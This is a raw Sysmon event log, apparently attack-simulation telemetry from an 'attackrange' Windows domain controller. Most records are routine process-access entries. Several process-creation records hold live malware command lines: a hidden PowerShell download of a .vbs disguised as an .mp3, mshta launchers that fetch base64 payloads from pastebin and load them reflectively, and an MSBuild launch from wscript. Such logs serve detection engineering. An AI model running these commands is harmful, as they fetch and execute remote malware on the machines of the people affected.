08:03:04.756{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7502-00000000FC01}7552C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107923Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7A02-00000000FC01}2000C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107922Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-B538-615A-7202-00000000FC01}72724540C:\Windows\System32\cmd.exe{58E9C193-B538-615A-7A02-00000000FC01}2000C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107921Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.763{58E9C193-B538-615A-7A02-00000000FC01}2000C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B538-615A-7202-00000000FC01}7272C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107920Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107919Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.756{58E9C193-B538-615A-6802-00000000FC01}81005972C:\Windows\System32\WScript.exe{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107918Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.750{58E9C193-B538-615A-7902-00000000FC01}1444C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe4.8.3761.0 built by: NET48REL1MSBuild.exeMicrosoft® .NET FrameworkMicrosoft CorporationMSBuild.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=A52C95049B9EBCD4810762DD7982C146,SHA256=BDF02CE13252A66E6763F849C2FCFFBDD64E045567D0A2E47F0E972C42A287CE,IMPHASH=00000000000000000000000000000000{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107917Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-B538-615A-7502-00000000FC01}75525588C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7402-00000000FC01}7400C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107916Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-AE62-615A-B200-00000000FC01}32123188C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7802-00000000FC01}1396C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107915Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107914Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107913Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107912Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107911Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-B538-615A-7102-00000000FC01}68648004C:\Windows\system32\conhost.exe{58E9C193-B538-615A-7602-00000000FC01}5716C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107910Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107909Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107908Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107907Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107906Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107905Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-B538-615A-6802-00000000FC01}81007300C:\Windows\System32\WScript.exe{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+a909f|C:\Windows\System32\windows.storage.dll+a8d15|C:\Windows\System32\windows.storage.dll+a8806|C:\Windows\System32\windows.storage.dll+a9c78|C:\Windows\System32\windows.storage.dll+a862e|C:\Windows\System32\windows.storage.dll+ab445|C:\Windows\System32\windows.storage.dll+ab7c4|C:\Windows\System32\windows.storage.dll+aae00|C:\Windows\System32\SHELL32.dll+3ccff|C:\Windows\System32\SHELL32.dll+3cb8c|C:\Windows\System32\SHELL32.dll+dcb2e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107904Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.742{58E9C193-B538-615A-7702-00000000FC01}7376C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://libya2020.com.ly/google0rvi.mp3','C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs');Start-Process 'C:\Users\ADMINI~1\AppData\Local\Temp\HsUCsYfsgsd5Q1.vbs'C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{58E9C193-B538-615A-6802-00000000FC01}8100C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\_______ _____ ___ ______ ______.vbs" 10341000x8000000000000000107903Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-AE62-615A-B200-00000000FC01}32126164C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7602-00000000FC01}5716C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107902Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-B538-615A-6F02-00000000FC01}30568092C:\Windows\System32\cmd.exe{58E9C193-B538-615A-7602-00000000FC01}5716C:\Windows\system32\PING.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+8564|C:\Windows\System32\cmd.exe+c347|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107901Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.740{58E9C193-B538-615A-7602-00000000FC01}5716C:\Windows\System32\PING.EXE10.0.14393.0 (rs1_release.160715-1616)TCP/IP Ping CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationping.exeping 127.0.0.1 -n 10 C:\Temp\ATTACKRANGE\Administrator{58E9C193-AE65-615A-D9E8-0D0000000000}0xde8d92HighMD5=7B647B55695ACE1E99158F79AB3AF51A,SHA256=ED7FA5B3CCBDD31A9E83F7C59F78AB5E2C83C7FEEDCC5F8B95948D11EBD7FF34,IMPHASH=5AAE2D3679223F82E19660D380B78FB5{58E9C193-B538-615A-6F02-00000000FC01}3056C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) 10341000x8000000000000000107900Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.737{58E9C193-AE62-615A-B200-00000000FC01}32122980C:\Windows\system32\csrss.exe{58E9C193-B538-615A-7502-00000000FC01}7552C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107899Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.737{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107898Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.736{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107897Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.736{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107896Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.735{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107895Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.735{58E9C193-ACA7-615A-1100-00000000FC01}3601664C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7302-00000000FC01}7156C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107894Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:04.735{58E9C193-ACA7-615A-1100-00000000FC01}3601336C:\Windows\system32\svchost.exe{58E9C193-B538-615A-7302-00000000FC01}7156C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107893Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 